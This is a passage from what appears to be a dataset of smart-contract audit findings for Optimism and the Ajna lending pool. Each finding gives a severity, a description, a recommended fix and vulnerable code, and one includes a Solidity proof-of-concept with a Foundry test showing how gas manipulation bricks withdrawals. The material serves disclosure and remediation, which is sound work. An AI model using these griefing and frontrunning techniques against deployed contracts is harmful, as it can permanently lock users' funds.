Include this list when prechecking withdrawals to ensure that they are included in the storage slot matching process, but not included in withdrawals to be transferred to the new system.\\nSpecial note\\nAfter coming up with this attack, we've noticed that someone has done exactly what we described and sent a message directly to the MessagePasser! Obviously this TX has nothing to do with us and we want to make sure Optimism is absolutely safe during migration. Furthermore, this TX should be traced and if a contestant is linked to this then they should clearly be disqualified from being rewarded.","Exploitation of this bug would lead to significant challenges for the Optimism team, needing to run a less tested migration process (which could lead to further issues), and a significant amount of FUD in pausing a partially completed migration partway through. We think that the ability to unexpectedly shut down the migration causes enough structural damage as well as second-order financial damage to warrant high severity.","```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n" +"Withdrawals with high gas limits can be bricked by a malicious user, permanently locking funds",high,"Transactions to execute a withdrawal from the Optimism Portal require the caller to send enough gas to cover `gasLimit` specified by the withdrawer.\\nBecause the EVM limits the total gas forwarded on to 63/64ths of the total `gasleft()` (and silently reduces it to this value if we try to send more) there are situations where transactions with high gas limits will be vulnerable to being reverted.\\nBecause there are no replays on this contract, the result is that a malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be withdrawn from L2's `L2ToL1MessagePasser` contract to L1's `OptimismPortal` contract. 
This is a less ""user-friendly"" withdrawal path, presumably for users who know what they are doing.\\nOne of the quirks of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nIn order to ensure that failed transactions can only happen at the fault of the user, the contract implements a check to ensure that the gasLimit is sufficient:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n\\nWhen the transaction is executed, the contract requests to send along all the remaining gas, minus the hardcoded `FINALIZE_GAS_BUFFER` for actions after the call. The goal is that this will ensure that the amount of gas forwarded on is at least the gas limit specified by the user.\\nOptimism is aware of the importance of this property being correct when they write in the comments:\\n“We want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.”\\nThe issue is that the EVM specifies the maximum gas that can be sent to an external call as 63/64ths of the `gasleft()`. For very large gas limits, this 1/64th that remains could be greater than the hardcoded FINALIZE_GAS_BUFFER value. 
In this case, less gas would be forwarded along than was directed by the contract.\\nHere is a quick overview of the math:\\nWe need X gas to be sent as a part of the call.\\nThis means we need `X * 64 / 63` gas to be available at the time the function is called.\\nHowever, the only check is that we have `X + 20_000` gas a few operations prior to the call (which guarantees that we have `X + 14878` at the time of the call).\\nFor any situation where `X / 64 > 14878` (in other words, when the amount of gas sent is greater than 952_192), the caller is able to send an amount of gas that passes the check, but doesn't forward the required amount on in the call.","Change the check to account for this 63/64 rule:\\n```\\nrequire(\\n gasleft() >= (_tx.gasLimit + FINALIZE_GAS_BUFFER) * 64 / 63,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n","For any withdrawal with a gas limit of at least 952,192, a malicious user can call `finalizeWithdrawalTransaction()` with an amount of gas that will pass the checks, but will end up forwarding along less gas than was specified by the user.\\nThe result is that the withdrawing user can have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n(Note that we added 5122 to the gas included in the call to correct for the other bug we submitted, as this issue remains even when the other bug is patched.)\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata 
Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n _success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. 
We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000 + 5122, // fix for other bug\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Portal.sol"";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu = new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 11_245_655}(500);\\n assert(gu.s(499) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 11_245_655,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: abi.encodeWithSignature(""store(uint256)"", 500)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(""OptimismPortal: insufficient gas to finalize withdrawal""));\\n _executePortalWithGivenGas(11_266_734);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(11_433_180);\\n assert(gu.s(499) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(11_266_735);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(11_433_179);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nAs you can see:\\nWe verify that the call to the target contract succeeds with 11,245,655 gas, and set that 
as gasLimit for all tests. This is the `X` from our formula above.\\nThis means that we need `11_245_655 * 64 / 63 = 11_424_157` gas available at the time the call is made.\\nThe test uses `9023` gas before it makes our call, so we can see that if we send `11_424_157 + 9_023 = 11_433_180` gas, the test passes.\\nSimilarly, if we send `11_266_734` gas, the total gas will be small enough to fail the require check.\\nBut in the sweet spot between these values, we have enough gas to pass the require check, but when we get to the call, the amount of gas requested is more than 63/64ths of the total, so the EVM sends less than we asked for. As a result, the transaction fails.","```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n ""OptimismPortal: insufficient gas to finalize withdrawal""\\n);\\n```\\n" +Challenger can override the 7 day finalization period,medium,"All withdrawals are finalized after a 7 days window (finalization period). After this duration transaction are confirmed and user can surely withdraw their balance. But due to lack of check, challenger can delete a l2Output which is older than 7 days meaning withdrawals will stop working for even confirmed transaction\\nProposer has proposed L2 output for a _l2BlockNumber which creates entries on l2Outputs using the proposeL2Output. 
Assume this creates a new l2Output at index X\\n```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n\\nproveWithdrawalTransaction has been called for user linked to this l2Output\\nFinalization period(7 day) is over after proposal and Users is ready to call `finalizeWithdrawalTransaction` to withdraw their funds\\nSince confirmation is done, User A is sure that he will be able to withdraw and thinks to do it after coming back from his holidays\\nChallenger tries to delete the index X (Step 1), ideally it should not be allowed as already confirmed. But since there is no such timeline check so the l2Output gets deleted\\n```\\nfunction deleteL2Outputs(uint256 _l2OutputIndex) external {\\n require(\\n msg.sender == CHALLENGER,\\n ""L2OutputOracle: only the challenger address can delete outputs""\\n );\\n\\n // Make sure we're not *increasing* the length of the array.\\n require(\\n _l2OutputIndex < l2Outputs.length,\\n ""L2OutputOracle: cannot delete outputs after the latest output index""\\n );\\n\\n uint256 prevNextL2OutputIndex = nextOutputIndex();\\n\\n // Use assembly to delete the array elements because Solidity doesn't allow it.\\n assembly {\\n sstore(l2Outputs.slot, _l2OutputIndex)\\n }\\n\\n emit OutputsDeleted(prevNextL2OutputIndex, _l2OutputIndex);\\n }\\n```\\n\\nUser comes back and now tries to withdraw but the withdraw fails since the l2Output index X does not exist anymore. This is incorrect and nullifies the network guarantee.\\nNote: In case of a separate output root could be proven then user withdrawal will permanently stuck. 
Ideally if such anomaly could not be caught within finalization period then user should be allowed to withdraw","Add below check in\\n```\\nrequire(getL2Output(_l2OutputIndex).timestamp<=FINALIZATION_PERIOD_SECONDS, ""Output already confirmed"");\\n```\\n",Withdrawal will fail for confirmed transaction,"```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n" +user can drawDebt that is below dust amount,medium,"According to the protocol, drawDebt prevents user from drawing below the `quoteDust_` amount. However, a logical error in the code can allow user to draw below dust amount.\\n`_revertOnMinDebt` is used in `drawDebt` to prevent dust loans. As you can see, the protocol wants to take the average of debt in the pool and make it the minimum if there are 10 or more loans. If it is lower than 10 loans, a `quoteDust` is used as the minimum. There is an edge case, whereby there are 10 loans in the pool, and the borrowers repay the loans till there is only 1 unit owed for each loan.(Might revert due to rounding error but it is describing a situation whereby repaying till a low amount of poolDebt can enable this). 
A new borrower can then `drawDebt` and because `_revertOnMindebt` only goes through the average loan amount check and not the `quoteDust_` amount check, he/she is able to draw loan that is well below the `quoteDust_` amount.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n\\n```\\n function _minDebtAmount(\\n uint256 debt_,\\n uint256 loansCount_\\n ) pure returns (uint256 minDebtAmount_) {\\n if (loansCount_ != 0) {\\n minDebtAmount_ = Maths.wdiv(Maths.wdiv(debt_, Maths.wad(loansCount_)), 10**19);\\n }\\n }\\n```\\n","Issue user can drawDebt that is below dust amount\\nRecommend checking that loan amount is more than `quoteDust_` regardless of the loan count.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } \\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n \\n }\\n }\\n```\\n","A minimum loan amount is used to deter dust loans, which can diminish user experience.","```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert 
DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n" +"CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interest",medium,"CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool\\nIn the current implementation in the factory contract and the pool contract, special logic is in-place to handle non-standard NFT such as crypto-kitty, crypto-figher or crypto punk.\\nIn the factory contract:\\n```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n\\nAnd in ERC721Pool When handling ERC721 token transfer:\\n```\\n/**\\n * @notice Helper function for transferring multiple NFT tokens from msg.sender to pool.\\n * @notice Reverts in case token id is not supported by subset pool.\\n * @param poolTokens_ Array in pool that tracks NFT ids (could be tracking NFTs pledged by borrower or NFTs added by a lender in a specific bucket).\\n * @param tokenIds_ Array of NFT token ids to transfer from msg.sender to pool.\\n */\\nfunction _transferFromSenderToPool(\\n uint256[] storage poolTokens_,\\n uint256[] calldata tokenIds_\\n) internal {\\n bool 
subset = _getArgUint256(SUBSET) != 0;\\n uint8 nftType = _getArgUint8(NFT_TYPE);\\n\\n for (uint256 i = 0; i < tokenIds_.length;) {\\n uint256 tokenId = tokenIds_[i];\\n if (subset && !tokenIdsAllowed[tokenId]) revert OnlySubset();\\n poolTokens_.push(tokenId);\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(msg.sender, address(this), tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n else{\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).buyPunk(tokenId);\\n }\\n\\n unchecked { ++i; }\\n }\\n}\\n```\\n\\nand\\n```\\nuint8 nftType = _getArgUint8(NFT_TYPE);\\n\\nfor (uint256 i = 0; i < amountToRemove_;) {\\n uint256 tokenId = poolTokens_[--noOfNFTsInPool]; // start with transferring the last token added in bucket\\n poolTokens_.pop();\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(address(this), toAddress_, tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n }\\n else {\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).transferPunk(toAddress_, tokenId);\\n }\\n\\n tokensTransferred[i] = tokenId;\\n\\n unchecked { ++i; }\\n}\\n```\\n\\nnote if the NFT address is classified as either crypto kitties or crypto fighers, then the NFT type is classified as CryptoKitties, then transfer and transferFrom method is triggered.\\n```\\nif (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n```\\n\\nand\\n```\\nelse if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n}\\n```\\n\\nHowever, in both crypto-kitty and in crypto-figher NFT, the transfer and transferFrom method can be paused.\\nIn crypto-figher 
NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n public\\n whenNotPaused\\n{\\n```\\n\\nIn Crypto-kitty NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n external\\n whenNotPaused\\n{\\n```\\n\\nnote the WhenNotPaused modifier.","Issue CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interest\\nInterest should not be charged when external contract is paused to borrower when the external contract pause the transfer and transferFrom.","If the transfer and transferFrom is paused in CryptoKitty and CryptoFighter NFT, the borrowing and repaying and liquidating action is blocked in ERC721Pool, the user cannot fully clear his debt and has to pay the compounding interest when the transfer is paused.","```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n" +`moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accounting,high,"Both `removeQuoteToken()` and `moveQuoteToken()` can be used to completely remove all quote tokens from a bucket. 
When this happens, if at the same time `bucketCollateral == 0 && lpsRemaining != 0`, then the bucket should be declared bankrupt. This update is done in `removeQuoteToken()` but not in `moveQuoteToken()`.\\n`removeQuoteToken()` has the following check to update bankruptcy time when collateral and quote token remaining is 0, but lps is more than 0. `moveQuoteToken()` is however missing this check. Both this functions has the same effects on the `fromBucket` and the only difference is that `removeQuoteToken()` returns the token to `msg.sender` but `moveQuoteToken()` moves the token to another bucket.\\n```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\n",Issue `moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accounting\\nWe should check if a bucket is bankrupt after moving quote tokens.,"A future depositor to the bucket will get less lps than expected due to depositing in a bucket that is supposedly bankrupt, hence the lps they get will be diluted with the existing ones in the bucket.","```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\n" +The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage control,high,"The deposit / withdraw / trade transaction lack of expiration timestamp and slippage control\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) 
internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long and the trading activity is very time 
sensitive. Without a deadline check, the trade transaction can be executed long after the user submits the transaction; at that time, the trade can be done at a sub-optimal price, which harms the user's position.\\nThe deadline check ensures that the transaction is executed on time and that expired transactions revert.\\nthe second point is the slippage control:\\n```\\nrequire(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n```\\n\\nand\\n```\\nrequire(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n```\\n\\nthe slippage control ensures the user receives at least the specified minimum amount of the token they want to trade.\\nIn the current implementation, neither the deadline check nor the slippage control is in place when a user deposits / withdraws / trades.",Issue The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage control\\nWe recommend the protocol add deadline check and add slippage control.,"According to the whitepaper:\\nDeposits in the highest priced buckets offer the highest valuations on collateral, and hence offer the most liquidity to borrowers. They are also the first buckets that could be used to purchase collateral if a loan were to be liquidated (see 7.0 LIQUIDATIONS). We can think of a bucket's deposit as being utilized if the sum of all deposits in buckets priced higher than it is less than the total debt of all borrowers in the pool. The lowest price among utilized buckets or “lowest utilized price” is called the LUP. 
If we were to pair off lenders with borrowers, matching the highest priced lenders' deposits with the borrowers' debts in equal quantities, the LUP would be the price of the marginal (lowest priced and therefore least aggressive) lender thus matched (usually, there would be a surplus of lenders that were not matched, corresponding to less than 100% utilization of the pool).\\nThe LUP plays a critical role in Ajna: a borrower who is undercollateralized with respect to the LUP (i.e. with respect to the marginal utilized lender) is eligible for liquidation. Conversely, a lender cannot withdraw deposit if doing so would move the LUP down so far as to make some active loans eligible for liquidation. In order to withdraw quote token in this situation, the lender must first kick the loans in question.\\nBecause the deadline check is missing,\\nAfter a lender submit a transaction and want to add the token into Highest price busket to make sure the quote token can be borrowed out and generate yield.\\nHowever, the transaction is pending in the mempool for a very long time.\\nBorrower create more debt and other lender's add and withdraw quote token before the lender's transaction is executed.\\nAfter a long time later, the lender's transaction is executed.\\nThe lender find out that the highest priced bucket moved and the lender cannot withdraw his token because doing would move the LUP down eligible for liquidiation.\\nAccording to the whitepaper:\\n6.1 Trading collateral for quote token\\nDavid owns 1 ETH, and would like to sell it for 1100 DAI. He puts the 1 ETH into the 1100 bucket as claimable collateral (alongside Carol's 20000 deposit), minting 1100 in LPB in return. He can then redeem that 1100 LPB for quote token, withdrawing 1100 DAI. Note: after David's withdrawal, the LUP remains at 1100. 
If the book were different such that his withdrawal would move the LUP below Bob's threshold price of 901.73, he would not be able to withdraw all of the DAI.\\nThe case above is ideal, however, because the deadline check is missing, and there is no slippage control, the transactoin can be pending for a long time and by the time the trade transaction is lended, the withdraw amount can be less than 1100 DAI.\\nAnother example for lack of slippage, for example, the function below is called:\\n```\\n/// @inheritdoc IPoolLenderActions\\nfunction removeQuoteToken(\\n uint256 maxAmount_,\\n uint256 index_\\n) external override nonReentrant returns (uint256 removedAmount_, uint256 redeemedLPs_) {\\n _revertIfAuctionClearable(auctions, loans);\\n\\n PoolState memory poolState = _accruePoolInterest();\\n\\n _revertIfAuctionDebtLocked(deposits, poolBalances, index_, poolState.inflator);\\n\\n uint256 newLup;\\n (\\n removedAmount_,\\n redeemedLPs_,\\n newLup\\n ) = LenderActions.removeQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n RemoveQuoteParams({\\n maxAmount: maxAmount_,\\n index: index_,\\n thresholdPrice: Loans.getMax(loans).thresholdPrice\\n })\\n );\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, newLup);\\n\\n // move quote token amount from pool to lender\\n _transferQuoteToken(msg.sender, removedAmount_);\\n}\\n```\\n\\nwithout specificing the minReceived amount, the removedAmount can be very small comparing to the maxAmount user speicifced.","```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = 
UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n" +Adversary can grief kicker by frontrunning kickAuction call with a large amount of loan,medium,"Average debt size of the pool is used to calculated MOMP (Most optimistic matching price), which is used to derive NP (neutral price). Higher average debt size will result in lower MOMP and hence lower NP which will make it harder for kicker to earn a reward and more likely that the kicker is penalized. 
An adversary can manipulate the average debt size of the pool by frontrunning kicker's `kickAuction` call with a large amount of loan.\\nNP (neutral price) is a price that will be used to decide whether to reward a kicker with a bonus or punish the kicker with a penalty. In the event the auction ends with a price higher than NP, kicker will be given a penalty and if the auction ends with a price lower than NP, kicker will be rewarded with a bonus.\\nNP is derived from MOMP (Most optimistic matching price). BI refers to borrower inflator. Quoted from the whitepaper page 17, When a loan is initiated (the first debt or additional debt is drawn, or collateral is removed from the loan), the neutral price is set to the current MOMP times the ratio of the loan's threshold price to the LUP, plus one year's interest. As time passes, the neutral price increases at the same rate as interest. This can be expressed as the following formula for the neutral price as a function of time 𝑡, where 𝑠 is the time the loan is initiated.\\n```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n\\nTherefore the lower the MOMP, the lower the NP. Lower NP will mean that kicker will be rewarded less and punished more compared to a higher NP. Quoted from the white paper, The MOMP, or “most optimistic matching price,” is the price at which a loan of average size would match with the most favorable lenders on the book. Technically, it is the highest price for which the amount of deposit above it exceeds the average loan debt of the pool. In `_kick` function, MOMP is calculated as this. 
